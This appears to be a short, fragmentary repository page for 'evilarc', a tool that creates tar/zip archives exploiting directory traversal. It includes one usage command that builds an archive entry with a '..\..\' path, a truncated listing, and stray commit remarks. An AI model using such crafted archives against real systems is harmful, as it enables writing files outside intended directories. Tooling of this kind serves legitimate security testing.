evilarc
evilarc copied to clipboard
Create tar/zip archives that can exploit directory traversal vulnerabilities
Tested on Ubuntu 12.04: ``` $ python evilarc.py -f evil.war README.md Creating evil.war containing ..\..\..\..\..\..\..\..\README.md $ unzip -l evil.war Archive: evil.war Length Date Time Name --------- ---------- ----- ---- 616...
Also, my editor cleaned up some dangling whitespace...
Java binding useful in case if only java binaries available at local pc.